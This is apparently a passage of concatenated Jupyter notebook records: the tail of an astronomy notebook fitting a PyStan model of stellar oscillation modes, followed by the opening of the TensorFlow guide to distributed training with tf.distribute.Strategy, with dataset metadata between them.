9.39795903e-01\n 7.97515691e-01 3.15919692e+00 4.55426411e+00 6.82809417e+00\n 9.57560018e+00 8.64999231e+00 7.05306641e+00 1.67940325e+00\n 3.95864811e+00 1.37935502e+00 7.19151059e-01 1.28712030e-01\n 6.61874489e-01 1.40704174e+00 2.26304671e+00 -3.17661931e-01\n 3.56896921e-01 1.41583664e+00 1.49231420e+00 6.28305688e-01\n 6.01809992e-01 2.74302557e+00 5.91055917e-01 1.99763753e+00\n 2.66191336e+00 3.59116525e+00 2.36139704e+00 2.57433568e+00\n 3.58561973e+00 1.30713956e+00 1.10982321e-01 1.92736218e+00\n 1.17177910e+00 -6.67935968e-02 1.31002050e+00 7.92280766e-01\n 1.15491995e+00 2.06697189e+00 2.27523086e+00]\n [ 2.12906105e+00 2.51803237e+00 7.90905094e-01 4.77280234e-01\n 1.22338308e+00 1.39053868e+00 -1.26597262e-01 1.23737023e+00\n 2.39667984e-01 3.92284869e-01 1.53579918e+00 1.49195359e+00\n 1.35997462e+00 8.19790724e-01 6.64067077e-01 2.57078757e+00\n 7.43474781e-01 9.63438702e-01 -6.37217094e-02 -8.12459739e-01\n 3.59870078e+00 7.41500005e-01 9.02682901e-01 6.09073407e-01\n 1.75169836e+00 7.29265467e-01 2.71400954e+00 7.51467784e-02\n 6.64758212e-01 6.91476759e-01 1.04939414e+00 1.86608771e+00\n 6.60001048e-01 4.53447188e+00 3.74530068e+00 7.02055911e+00\n 1.16468274e+01 1.43587907e+01 1.74638750e+01 1.30655366e+01\n 5.99645319e+00 5.86562362e+00 1.33042652e+00 2.43032763e+00\n 5.03371450e-01 1.15901037e+00 1.04058956e+00 1.45304772e+00\n 1.02457650e+00 2.34236769e+00 2.21662342e+00 1.02589732e+00\n 1.93097093e+00 2.00857601e+00 2.42740177e+00 -3.04044359e-01\n 6.57431415e-01 5.41104702e-01 -3.59108311e-01 1.59386874e+00\n 6.47247660e-01 3.38939099e-01 1.76170842e+00 2.86369133e-02\n 1.18616304e+00 1.80801739e+00 2.23731018e-01 1.44312668e+00\n 2.14281319e+00 5.74353414e-01 6.60002564e-01]\n [ 1.53884254e+00 1.96372532e+00 -1.25214421e-01 1.00908727e+00\n 6.84738525e-01 1.91414636e+00 1.44746061e-01 2.01652774e+00\n 1.04892184e+00 2.56468508e+00 1.31971614e+00 1.69479068e+00\n 9.85488460e-01 7.07432393e-01 1.22421567e+00 2.45224258e-01\n 1.54669925e+00 7.39533193e-01 1.98517881e+00 -4.56930212e-01\n 1.04960336e+00 -5.23514568e-01 2.02056562e+00 2.15696541e+00\n 2.33637111e+00 1.30931655e+00 1.20701869e+00 3.28367914e+00\n -3.17106913e-01 -1.27382566e-02 1.64668737e+00 2.56323154e+00\n 3.57548946e+00 2.90792639e+00 2.89663279e+00 4.22360302e+00\n 5.75431480e+00 1.12150742e+01 1.41977542e+01 2.13849415e+01\n 1.82791280e+01 1.10094869e+01 6.82856142e+00 4.90717633e+00\n 2.27296099e+00 1.78841974e+00 2.87628684e+00 5.32980295e-01\n 2.47027679e+00 3.28244775e+00 2.46829416e+00 1.81270188e+00\n 7.94521733e-03 1.81572686e+00 -1.96326329e-01 2.03357146e+00\n -4.01627439e-01 3.32535303e+00 2.76857949e+00 -1.05261221e-01\n -7.05522892e-03 2.75050591e+00 1.02291949e+00 -6.01280291e-02\n 1.82551068e-01 9.27540618e-01 1.41947254e+00 1.60313410e+00\n 1.98153804e+00 -3.71475692e-01 1.55884639e+00]\n [ 1.36549514e+00 2.64663302e+00 5.70668913e-01 1.25875001e+00\n 3.44389776e+00 8.95364397e-01 2.21000236e+00 7.57289303e-01\n 2.88583098e+00 -4.84688274e-01 -5.57627454e-01 3.32238918e+00\n -5.42443432e-01 1.04954803e-01 1.56653357e+00 -4.66110623e-02\n 7.13488893e-01 -3.89470270e-01 1.17040289e+00 3.88121774e+00\n 1.22460971e+00 3.69146502e-01 -1.86977496e-01 1.22297969e+00\n 3.53371970e+00 -6.89862784e-01 1.77867454e+00 8.21563409e-01\n 1.33942156e+00 3.47185556e+00 1.10842876e+00 2.37814229e+00\n 2.91081517e+00 5.09371807e+00 6.90339548e+00 9.19910840e+00\n 1.58282693e+01 2.43228658e+01 2.22476922e+01 1.75175018e+01\n 7.36277555e+00 5.96345201e+00 4.64262234e+00 4.71585788e+00\n 2.29949145e+00 4.03784885e-01 2.34395623e+00 4.94218839e-01\n 2.19394324e+00 4.98850079e+00 1.32037231e+00 1.75755600e+00\n 3.50496777e+00 -2.85199122e-01 2.22827655e+00 -1.81879062e+00\n 1.09146188e+00 1.09958055e-01 8.42773585e-01 1.11856357e+00\n 4.70426920e-01 6.65256236e-01 7.01646130e-01 2.86124929e+00\n 8.31334140e-01 9.01514742e-01 1.66521330e-01 7.09739649e-01\n -1.64030611e+00 1.51987578e+00 1.38695964e-01]\n [-1.03520132e+00 1.84598545e+00 2.10479085e-01 2.10441366e+00\n 9.32345131e-01 2.67686202e+00 2.17242216e-01 1.24288450e+00\n 2.37615487e+00 1.15617576e+00 1.95237926e+00 1.28203426e+00\n 2.18729581e+00 1.21577037e+00 2.18785397e+00 1.57532306e+00\n 2.74265024e+00 8.47171296e-01 4.95575101e-01 1.94127375e+00\n 1.95519584e+00 2.01524230e+00 2.41816791e+00 2.75765680e-01\n 2.31975802e+00 1.69678821e+00 2.57523811e-03 3.04883555e+00\n 2.18431179e-01 2.30324043e+00 2.42405133e+00 3.55531087e+00\n 1.88008975e+00 2.59486455e+00 3.08491337e+00 5.14480584e+00\n 6.71203225e+00 1.45730660e+01 2.24198767e+01 2.39709788e+01\n 1.88966850e+01 1.12369913e+01 5.20375737e+00 5.23948444e+00\n 2.80516560e+00 2.66170748e+00 1.71635182e+00 1.35566514e+00\n 2.70684164e+00 2.36118093e+00 1.92323083e+00 1.77023482e+00\n -3.36981410e-01 2.27388935e+00 7.71603723e-01 3.57767372e-01\n 2.02151503e+00 3.58805455e-01 4.15950762e-01 3.19185356e-01\n 2.28313382e+00 1.32719582e+00 2.54001760e+00 -1.00767747e+00\n 1.21786166e+00 1.36140951e+00 7.40043996e-01 1.82140196e+00\n 5.37526840e-01 4.39184691e-01 7.95245618e-01]\n [ 3.21433946e+00 1.42649766e+00 1.35623521e+00 4.86691947e-01\n 1.27350915e+00 5.08093025e-01 5.74788535e-01 2.96994306e+00\n 4.72150210e-01 -7.29269783e-01 2.96745397e+00 1.24696043e-01\n -2.05693531e-02 1.90615282e+00 -2.86476268e-01 1.39708562e+00\n 2.56669915e+00 2.10242242e+00 9.07870248e-01 1.21685142e+00\n 9.97067521e-01 2.15598865e+00 2.61124578e+00 1.28744963e+00\n 4.78062050e-01 2.26188738e+00 2.15595852e+00 3.25065256e+00\n 1.81812475e+00 3.58659283e-01 -2.41356104e-01 3.87397295e+00\n 3.93348136e+00 3.84482282e+00 6.69933954e+00 9.82382170e+00\n 1.67641931e+01 2.13692453e+01 1.61882800e+01 9.51787808e+00\n 6.62127046e+00 4.49586775e+00 3.20705143e+00 1.13737899e+00\n 1.56295540e+00 1.58373110e+00 1.81351399e+00 1.96033448e+00\n 2.38744143e+00 -5.24688128e-01 2.07297252e-01 9.93264936e-01\n 2.39604449e+00 1.20128288e+00 1.18755987e+00 1.65301034e+00\n 1.18145165e+00 3.07992412e-03 7.79802951e-01 2.28793115e+00\n 1.15317153e+00 1.99952255e+00 1.11804771e+00 -3.61660859e-01\n 2.55758899e+00 -4.64194119e-04 1.24146455e+00 1.50028365e+00\n 8.44875297e-01 -2.87063108e-01 1.62069068e+00]\n [ 3.06308265e+00 1.42184735e+00 1.45186313e-01 -2.62565616e-01\n 7.26619674e-01 1.82911001e+00 -1.27498109e+00 8.69033571e-01\n 1.03040403e+00 2.39099229e+00 7.92789379e-01 7.31565126e-01\n 1.19599048e+00 6.42550158e-01 1.53936771e+00 2.31598802e+00\n 2.24055985e+00 1.18140441e+00 1.49008858e+00 8.67208995e-01\n -7.04493390e-01 5.98109360e-01 7.08354573e-01 1.86670970e+00\n 2.47416848e+00 -3.59312697e-01 1.71830884e+00 2.87087487e+00\n 2.23182128e+00 1.89799686e+00 2.04826044e+00 2.73763971e+00\n 2.44342818e+00 2.95887171e+00 2.48625817e+00 3.92812780e+00\n 4.95751257e+00 9.24456635e+00 1.55575864e+01 1.57038087e+01\n 1.09926159e+01 7.01142765e+00 3.52060000e+00 1.90856248e+00\n 3.43148371e+00 1.97052563e+00 -6.36221672e-04 2.53248912e+00\n 2.57224908e+00 9.59462875e-01 1.44833092e+00 9.35300716e-01\n 2.59020849e-01 4.68760453e-01 -1.07025500e+00 6.21691646e-01\n 4.03722336e-01 6.00565177e-01 2.87782293e+00 1.33108039e+00\n 5.40761730e-01 1.21929031e+00 -2.13048997e+00 6.75301983e-01\n 4.65823324e-01 -3.58420222e-01 -3.00173357e-02 3.19250218e+00\n 1.23198733e+00 -1.53732446e+00 6.14548753e-01]\n [ 8.70278370e-02 1.58278618e+00 5.07776396e-01 9.08459051e-02\n 4.64367021e+00 2.06858366e+00 2.25249701e+00 5.47224412e-01\n 6.78859552e-01 1.06434665e+00 2.92826995e+00 1.90263776e+00\n 6.81595387e-01 3.74587908e-01 4.65940803e-01 3.62689773e-02\n 5.72309782e-01 1.95878152e+00 1.22935635e+00 1.58387750e+00\n 3.21103841e-01 1.46297614e+00 1.08190619e+00 2.94072387e-01\n 3.23394830e+00 1.61583258e+00 5.33589151e-01 4.58199055e+00\n 6.06631658e-01 -4.24491816e-01 1.77006615e-01 1.95838707e+00\n 1.51472733e+00 2.46019735e+00 2.67462460e+00 2.93116606e+00\n 3.85064593e+00 4.35172632e+00 9.49291956e+00 1.14851154e+01\n 7.60647094e+00 4.92598831e+00 4.07163132e+00 4.15367668e+00\n 1.60245182e+00 3.04457623e+00 8.35587604e-01 -4.15794100e-01\n 2.80016349e+00 3.34931461e-01 3.26823760e+00 1.06901164e+00\n 1.91124149e+00 2.17539413e+00 2.13205814e+00 2.35692346e+00\n 2.31203379e+00 2.30858086e+00 2.36365774e+00 1.90154992e+00\n 6.07382665e-01 1.70271220e+00 1.88157957e+00 3.15410157e+00\n 9.45246826e-01 2.18498617e+00 7.36572712e-01 1.47861580e+00\n 2.16104937e+00 -2.86774225e-01 1.24894412e+00]\n [ 2.10186690e+00 7.56080073e-01 1.71843872e+00 1.36408639e+00\n 1.95767647e+00 6.67871200e-02 3.30280974e-02 2.11917311e+00\n 1.66526601e+00 6.50752320e-01 1.16689539e+00 4.89854145e-01\n 2.16452196e+00 -2.87435491e-01 1.08225345e+00 7.61448963e-01\n 9.44075747e-01 2.35507330e+00 1.31966189e+00 2.12474265e+00\n 2.22884075e+00 1.21885955e+00 7.56736532e-01 -1.11366709e+00\n 2.75668231e-01 7.60446133e-01 1.43860350e-01 2.07850474e+00\n 1.23652853e+00 1.36239517e+00 1.34984048e+00 2.01656678e+00\n -3.49438085e-01 -1.45040578e+00 -1.21105090e-01 2.05381095e+00\n 1.48947535e+00 3.99297316e+00 5.91298497e+00 5.61273707e+00\n 5.13274392e+00 4.00438190e+00 1.07929137e+00 2.67589914e+00\n 1.78037481e+00 1.02772332e-02 1.75362158e+00 7.08765592e-01\n 2.01589152e+00 5.92972401e-01 1.24998779e+00 -1.52740224e+00\n 1.95195961e+00 1.80882201e+00 1.41856842e+00 1.16957196e+00\n 1.06925902e+00 1.58875558e+00 2.06501592e+00 2.32569709e+00\n 4.79097420e-01 -1.24263207e-01 2.15186971e+00 9.28637223e-01\n 1.36997579e+00 4.48371614e-01 8.00876588e-01 1.01921126e+00\n 2.55647320e+00 -4.55146490e-01 1.46440487e+00]\n [ 1.77368615e+00 -1.35811674e+00 7.61036893e-01 4.04603835e-01\n 4.19556019e-01 3.30879665e-01 1.98660689e+00 1.01834586e+00\n 2.01308930e+00 1.85152225e+00 7.83510363e-01 1.05480083e+00\n 3.71915790e-02 1.55312867e+00 1.23506052e+00 5.90532844e-01\n 6.56451022e-01 3.38133934e+00 2.49724687e+00 6.24603192e-02\n 2.44923091e+00 1.57573771e+00 1.20662120e-01 2.14733540e+00\n 1.18813900e+00 2.14501521e+00 -5.07455602e-01 3.67728319e-01\n 1.77534701e+00 -7.04785500e-01 1.43738460e+00 1.26008192e+00\n 2.21327907e+00 7.31552728e-01 1.74414025e+00 8.33083216e-01\n 1.08291903e+00 3.14626084e-01 2.12643427e+00 3.43204568e+00\n 1.38437701e+00 5.82725385e-01 2.59560115e+00 1.27815522e+00\n 2.22627208e+00 -1.62903028e-01 1.23263127e+00 2.23253538e+00\n 5.57201442e-01 1.52544709e+00 7.91176643e-01 5.50822338e-01\n 4.16718300e-01 1.61117111e+00 -3.11310010e-01 2.55906694e+00\n 1.46518464e+00 1.12440708e+00 -2.57791023e-01 1.47689227e+00\n 1.49434921e-01 1.63565440e+00 1.82299471e+00 1.51541379e+00\n 1.96728743e+00 7.87902263e-01 -3.64527094e-01 9.74052971e-01\n 2.37086926e+00 1.51573270e+00 1.03086052e+00]\n [ 1.77352937e+00 1.30930738e+00 1.27249965e+00 1.60823082e+00\n 1.43883683e+00 -6.13101327e-01 1.67209884e+00 -8.78477953e-01\n 1.65527508e+00 1.19489175e+00 7.07495435e-01 1.66198445e-01\n 1.42468249e+00 2.73166073e+00 -1.13827046e+00 8.85951598e-01\n -7.13540784e-01 4.94799345e-01 8.03724417e-01 6.43777752e-01\n 1.84061071e+00 1.54085474e+00 4.40269845e-01 1.60944414e+00\n -9.68414080e-01 2.33662793e+00 -2.34572020e-01 1.45607408e+00\n 1.61319601e+00 2.08671847e-01 1.29983130e+00 6.67940808e-01\n 1.53463042e+00 3.01672734e-01 2.02081476e+00 3.75174307e-02\n 2.66459973e+00 2.42206085e+00 8.79951639e-01 2.73533549e+00\n 2.56090386e+00 8.79910622e-01 2.10286650e+00 -1.38734620e-02\n 1.31683039e+00 1.12961048e+00 2.60118729e+00 5.44623138e-01\n 4.11800287e-01 1.41278549e+00 1.65520817e+00 5.04467542e-01\n 1.50943201e+00 1.63647409e+00 -3.06238887e-01 2.43501288e+00\n 3.66189306e-01 -2.16349666e-01 9.25628756e-01 1.86677658e+00\n 1.08934892e+00 2.18286984e+00 2.17001355e-01 2.68832100e-01\n 2.15408079e+00 -2.51391997e+00 -9.13802792e-01 -2.76919192e-01\n 2.20808628e+00 1.15481029e+00 1.47654040e+00]]\n" ] ], [ [ "And now we build the example Pystan model:", "_____no_output_____" ] ], [ [ "code = '''\nfunctions {\n real lor(real freq, real f0, real w, real h){\n return h / (1 + 4 * ((freq - f0)/w)^2);\n }\n real gaussian(real f, real numax, real width, real height){\n return height * exp(-0.5 * (f - numax)^2 / width^2);\n }\n}\ndata {\n int N; // Data points per order\n int M; // Number of orders\n real freq[M, N];\n real snr[M, N];\n real dnu_est;\n real numax_est;\n}\nparameters {\n real<lower = 0> dnu;\n real<lower = 0> numax;\n real<lower = 0> envwidth;\n real<lower = 0> envheight;\n real modewidth;\n real delta[M];\n real<lower = 0> scale;\n}\ntransformed parameters {\n real mode_freqs[M];\n real mode_heights[M];\n for (i in 1:M){\n mode_freqs[i] = (i-0.5) * dnu + delta[i] * scale;\n mode_heights[i] = gaussian(mode_freqs[i], numax, envwidth, envheight);\n }\n}\nmodel {\n real beta[N];\n for (i in 1:M){\n for (j in 1:N){\n beta[j] = (1.0 + lor(freq[i, j], mode_freqs[i], modewidth, mode_heights[i]));\n }\n snr[i, :] ~ normal(beta, 1.0);\n }\n dnu ~ normal(dnu_est, dnu_est * 0.01);\n dnu ~ uniform(dnu_est * 0.9, dnu_est * 1.1);\n numax ~ normal(numax_est, numax_est * 0.01);\n numax ~ uniform(numax_est * 0.9, numax_est * 1.1);\n envwidth ~ normal(5.0, 1.0);\n envheight ~ normal(25.0, 3.0);\n modewidth ~ lognormal(log(0.1), 0.05);\n modewidth ~ uniform(0, 0.5);\n delta ~ normal(0, 1); \n scale ~ normal(0, 0.01);\n}\n'''\nimport pystan\nsm = pystan.StanModel(model_code=code)", "INFO:pystan:COMPILING THE C++ CODE FOR MODEL anon_model_ae1e6452f5130395d3f50a4387192288 NOW.\n" ] ], [ [ "The code takes a while to converge. We run for 20000 iterations and check the results.", "_____no_output_____" ] ], [ [ "stan_data = {'N': len(ladder_f[0,:]), 'M': len(ladder_p[:,0]), \n 'freq': ladder_f, 'snr': ladder_p,\n 'dnu_est': dnu, 'numax_est': numax}\nnchains = 4\nstart = {'dnu': dnu, 'numax': numax}\nfitsm = sm.sampling(data=stan_data, iter=20000, chains=nchains, init=[start for n in range(nchains)])", "/usr/local/Cellar/python3/3.6.4_2/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/pystan/misc.py:399: FutureWarning: Conversion of the second argument of issubdtype from `float` to `np.floating` is deprecated. In future, it will be treated as `np.float64 == np.dtype(float).type`.\n elif np.issubdtype(np.asarray(v).dtype, float):\n" ], [ "fitsm.plot()\nplt.show()", "_____no_output_____" ], [ "print(fitsm)", "Inference for Stan model: anon_model_ae1e6452f5130395d3f50a4387192288.\n4 chains, each with iter=20000; warmup=10000; thin=1; \npost-warmup draws per chain=10000, total post-warmup draws=40000.\n\n mean se_mean sd 2.5% 25% 50% 75% 97.5% n_eff Rhat\ndnu 2.0 9.9e-6 9.1e-4 2.0 2.0 2.0 2.0 2.0 8355 nan\nnumax 13.97 3.5e-4 0.07 13.84 13.92 13.97 14.02 14.11 40000 1.0\nenvwidth 5.07 4.1e-4 0.08 4.91 5.01 5.07 5.13 5.23 40000 1.0\nenvheight 24.97 2.5e-3 0.43 24.13 24.68 24.97 25.26 25.81 29869 1.0\nmodewidth 0.1 1.0e-5 2.0e-3 0.1 0.1 0.1 0.1 0.1 37423 1.0\ndelta[0] -0.36 4.3e-3 0.85 -2.0 -0.92 -0.37 0.19 1.37 40000 1.0\ndelta[1] 0.43 2.8e-3 0.57 -0.73 0.07 0.45 0.81 1.51 40000 1.0\ndelta[2] -2.0 3.1e-3 0.44 -2.93 -2.29 -1.99 -1.7 -1.18 21163 1.0\ndelta[3] -0.31 1.9e-3 0.24 -0.82 -0.47 -0.31 -0.15 0.15 17386 1.0\ndelta[4] 0.92 2.5e-3 0.25 0.45 0.75 0.91 1.09 1.44 10160 1.0\ndelta[5] 2.38 4.3e-3 0.43 1.59 2.08 2.37 2.66 3.28 10148 1.0\ndelta[6] -0.12 2.8e-3 0.26 -0.64 -0.3 -0.12 0.06 0.39 8684 1.0\ndelta[7] 1.1 3.7e-3 0.34 0.44 0.86 1.09 1.32 1.78 8468 1.0\ndelta[8] -1.51 4.2e-3 0.42 -2.37 -1.79 -1.5 -1.23 -0.71 9957 1.0\ndelta[9] 0.13 4.1e-3 0.38 -0.62 -0.13 0.13 0.39 0.89 8602 1.0\ndelta[10] 0.09 4.5e-3 0.43 -0.76 -0.2 0.09 0.38 0.94 9264 1.0\ndelta[11] -0.23 4.8e-3 0.53 -1.28 -0.59 -0.23 0.13 0.82 12459 1.0\ndelta[12] -0.23 4.7e-3 0.74 -1.6 -0.72 -0.26 0.22 1.38 24967 1.0\ndelta[13] -0.25 4.4e-3 0.89 -2.02 -0.83 -0.26 0.33 1.52 40000 1.0\nscale 0.02 3.4e-5 3.8e-3 0.02 0.02 0.02 0.03 0.03 12140 1.0\nmode_freqs[0] 0.99 9.9e-5 0.02 0.95 0.98 0.99 1.0 1.03 40000 1.0\nmode_freqs[1] 3.01 6.4e-5 0.01 2.98 3.0 3.01 3.02 3.03 40000 1.0\nmode_freqs[2] 4.95 4.2e-5 8.5e-3 4.94 4.95 4.95 4.96 4.97 40000 1.0\nmode_freqs[3] 6.99 2.2e-5 4.5e-3 6.98 6.99 6.99 6.99 7.0 40000 1.0\nmode_freqs[4] 9.02 1.4e-5 2.7e-3 9.01 9.01 9.02 9.02 9.02 40000 1.0\nmode_freqs[5] 11.05 1.0e-5 2.0e-3 11.04 11.05 11.05 11.05 11.05 40000 1.0\nmode_freqs[6] 12.99 8.7e-6 1.7e-3 12.99 12.99 12.99 12.99 12.99 40000 1.0\nmode_freqs[7] 15.02 8.8e-6 1.8e-3 15.01 15.02 15.02 15.02 15.02 40000 1.0\nmode_freqs[8] 16.96 1.0e-5 2.0e-3 16.95 16.95 16.96 16.96 16.96 40000 1.0\nmode_freqs[9] 18.99 1.3e-5 2.7e-3 18.99 18.99 18.99 18.99 19.0 40000 1.0\nmode_freqs[10] 20.99 2.0e-5 4.0e-3 20.98 20.99 20.99 20.99 21.0 40000 1.0\nmode_freqs[11] 22.98 4.1e-5 8.3e-3 22.97 22.98 22.98 22.99 23.0 40000 1.0\nmode_freqs[12] 24.98 8.4e-5 0.02 24.95 24.97 24.98 24.99 25.02 40000 1.0\nmode_freqs[13] 26.98 1.3e-4 0.02 26.93 26.96 26.98 26.99 27.02 28813 1.0\nmode_heights[0] 0.94 5.0e-4 0.1 0.76 0.88 0.94 1.01 1.15 40000 1.0\nmode_heights[1] 2.41 9.2e-4 0.18 2.06 2.29 2.41 2.53 2.78 40000 1.0\nmode_heights[2] 5.13 1.3e-3 0.27 4.61 4.95 5.13 5.31 5.66 40000 1.0\nmode_heights[3] 9.67 1.6e-3 0.33 9.03 9.45 9.67 9.89 10.31 40000 1.0\nmode_heights[4] 15.48 1.7e-3 0.34 14.81 15.25 15.48 15.71 16.14 40000 1.0\nmode_heights[5] 21.14 1.9e-3 0.37 20.41 20.89 21.13 21.38 21.86 36303 1.0\nmode_heights[6] 24.5 2.4e-3 0.42 23.68 24.22 24.5 24.78 25.32 30474 1.0\nmode_heights[7] 24.44 2.4e-3 0.42 23.63 24.16 24.44 24.72 25.26 30378 1.0\nmode_heights[8] 20.99 1.9e-3 0.36 20.29 20.75 20.99 21.24 21.71 35672 1.0\nmode_heights[9] 15.29 1.7e-3 0.34 14.64 15.06 15.29 15.51 15.95 40000 1.0\nmode_heights[10] 9.58 1.6e-3 0.32 8.95 9.36 9.58 9.8 10.21 40000 1.0\nmode_heights[11] 5.15 1.3e-3 0.27 4.63 4.97 5.15 5.33 5.68 40000 1.0\nmode_heights[12] 2.37 9.1e-4 0.18 2.02 2.24 2.36 2.49 2.73 40000 1.0\nmode_heights[13] 0.93 5.0e-4 0.1 0.75 0.86 0.93 1.0 1.14 40000 1.0\nlp__ -544.6 0.04 3.62 -552.7 -546.8 -544.3 -542.0 -538.6 10443 1.0\n\nSamples were drawn using NUTS at Mon Nov 5 17:25:33 2018.\nFor each parameter, n_eff is a crude measure of effective sample size,\nand Rhat is the potential scale reduction factor on split chains (at \nconvergence, Rhat=1).\n" ] ], [ [ "The convergence is good! (The nan Rhat is because the dnu value is so well constrained). We can check the inferred frequencies with respect to the true frequencies:", "_____no_output_____" ] ], [ [ "fig, ax = plt.subplots()\nax.scatter(f0s, fitsm['mode_freqs'].mean(axis=0) - f0s)\nax.errorbar(f0s, fitsm['mode_freqs'].mean(axis=0) - f0s, yerr=fitsm['mode_freqs'].std(axis=0))\nprint(fitsm['mode_freqs'].shape)\nprint(f0s.shape)", "(40000, 14)\n(14,)\n" ] ], [ [ "Here is a corner plot of the results:", "_____no_output_____" ] ], [ [ "import corner\npost = np.vstack([fitsm['dnu'], fitsm['numax'], fitsm['envheight'], fitsm['envwidth'], fitsm['modewidth']]).T\ncorner.corner(post)\nplt.show()", "_____no_output_____" ] ], [ [ "We can now compare the true model with the estimated model:", "_____no_output_____" ] ], [ [ "best = np.ones(len(f))\nbest += np.sum([lor(f, n, fitsm['modewidth'].mean(), gaussian(n, fitsm['numax'].mean(),\n fitsm['envheight'].mean(), fitsm['envwidth'].mean())\n ) for n in fitsm['mode_freqs'].mean(axis=0)], axis=0)\nplt.plot(f, best, 'k-.', label='best', zorder=99)\nplt.plot(f, true, label='true', zorder=98)\nplt.plot(f, data, label='Data')\nplt.legend()", "_____no_output_____" ] ], [ [ "This model works pretty well although things take a long time to converge. Hopefully for the real data, good informative priors on the general mode properties will help convergence.\n\nNote we will also have to use the proper chi squared two degrees of freedom noise of the real periodogram!", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e72ef159556d757f8bbf41f4e88b77ac857e3639
43,037
ipynb
Jupyter Notebook
site/en/guide/distribute_strategy.ipynb
MoniqueGautier/docs
3c232ea80b425efbcb0bb52bf1d26ca33cb26853
[ "Apache-2.0" ]
1
2019-05-15T12:37:10.000Z
2019-05-15T12:37:10.000Z
site/en/guide/distribute_strategy.ipynb
MoniqueGautier/docs
3c232ea80b425efbcb0bb52bf1d26ca33cb26853
[ "Apache-2.0" ]
null
null
null
site/en/guide/distribute_strategy.ipynb
MoniqueGautier/docs
3c232ea80b425efbcb0bb52bf1d26ca33cb26853
[ "Apache-2.0" ]
1
2020-04-20T18:08:01.000Z
2020-04-20T18:08:01.000Z
46.127546
1,143
0.621372
[ [ [ "##### Copyright 2018 The TensorFlow Authors.\n\n", "_____no_output_____" ] ], [ [ "#@title Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.", "_____no_output_____" ] ], [ [ "# Distributed Training in TensorFlow", "_____no_output_____" ], [ "<table class=\"tfo-notebook-buttons\" align=\"left\">\n <td>\n <a target=\"_blank\" href=\"https://www.tensorflow.org/alpha/guide/distribute_strategy\"><img src=\"https://www.tensorflow.org/images/tf_logo_32px.png\" />View on TensorFlow.org</a>\n </td>\n <td>\n <a target=\"_blank\" href=\"https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/r2/guide/distribute_strategy.ipynb\"><img src=\"https://www.tensorflow.org/images/colab_logo_32px.png\" />Run in Google Colab</a>\n </td>\n <td>\n <a target=\"_blank\" href=\"https://github.com/tensorflow/docs/blob/master/site/en/r2/guide/distribute_strategy.ipynb\"><img src=\"https://www.tensorflow.org/images/GitHub-Mark-32px.png\" />View source on GitHub</a>\n </td>\n</table>", "_____no_output_____" ], [ "## Overview\n\n`tf.distribute.Strategy` is a TensorFlow API to distribute training\nacross multiple GPUs, multiple machines or TPUs. Using this API, users can distribute their existing models and training code with minimal code changes.\n\n`tf.distribute.Strategy` has been designed with these key goals in mind:\n* Easy to use and support multiple user segments, including researchers, ML engineers, etc.\n* Provide good performance out of the box.\n* Easy switching between strategies.\n\n`tf.distribute.Strategy` can be used with TensorFlow's high level APIs, [tf.keras](https://www.tensorflow.org/guide/keras) and [tf.estimator](https://www.tensorflow.org/guide/estimators), with just a couple of lines of code change. It also provides an API that can be used to distribute custom training loops (and in general any computation using TensorFlow).\nIn TensorFlow 2.0, users can execute their programs eagerly, or in a graph using [`tf.function`](../tutorials/eager/tf_function.ipynb). `tf.distribute.Strategy` intends to support both these modes of execution. Note that we may talk about training most of the time in this guide, but this API can also be used for distributing evaluation and prediction on different platforms.\n\nAs you will see in a bit, very few changes are needed to use `tf.distribute.Strategy` with your code. This is because we have changed the underlying components of TensorFlow to become strategy-aware. This includes variables, layers, models, optimizers, metrics, summaries, and checkpoints.\n\nIn this guide, we will talk about various types of strategies and how one can use them in a different situations.", "_____no_output_____" ] ], [ [ "# Import TensorFlow\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n!pip install tf-nightly-gpu\n\nimport tensorflow as tf", "_____no_output_____" ] ], [ [ "## Types of strategies\n`tf.distribute.Strategy` intends to cover a number of use cases along different axes. Some of these combinations are currently supported and others will be added in the future. Some of these axes are:\n* Syncronous vs asynchronous training: These are two common ways of distributing training with data parallelism. In sync training, all workers train over different slices of input data in sync, and aggregating gradients at each step. In async training, all workers are independently training over the input data and updating variables asynchronously. Typically sync training is supported via all-reduce and async through parameter server architecture.\n* Hardware platform: Users may want to scale their training onto multiple GPUs on one machine, or multiple machines in a network (with 0 or more GPUs each), or on Cloud TPUs.\n\nIn order to support these use cases, we have 4 strategies available. In the next section we will talk about which of these are supported in which scenarios in TF nightly at this time.", "_____no_output_____" ], [ "### MirroredStrategy\n`tf.distribute.MirroredStrategy` support synchronous distributed training on multiple GPUs on one machine. It creates one model replica per GPU device. Each variable in the model is mirrored across all the replicas. Together, these variables form a single conceptual variable called `MirroredVariable`. These variables are kept in sync with each other by applying identical updates.\n\nEfficient all-reduce algorithms are used to communicate the variable updates across the devices.\nAll-reduce aggregates tensors across all the devices by adding them up, and makes them available on each device.\nIt’s a fused algorithm that is very efficient and can reduce the overhead of synchronization significantly. There are many all-reduce algorithms and implementations available, depending on the type of communication available between devices. By default, it uses NVIDIA NCCL as the all-reduce implementation. The user can also choose between a few other options we provide, or write their own.\n\nHere is the simplest way of creating `MirroredStrategy`:\n", "_____no_output_____" ] ], [ [ "mirrored_strategy = tf.distribute.MirroredStrategy()", "_____no_output_____" ] ], [ [ "This will create a `MirroredStrategy` instance which will use all the GPUs that are visible to TensorFlow, and use NCCL as the cross device communication.\n\nIf you wish to use only some of the GPUs on your machine, you can do so like this:", "_____no_output_____" ] ], [ [ "mirrored_strategy = 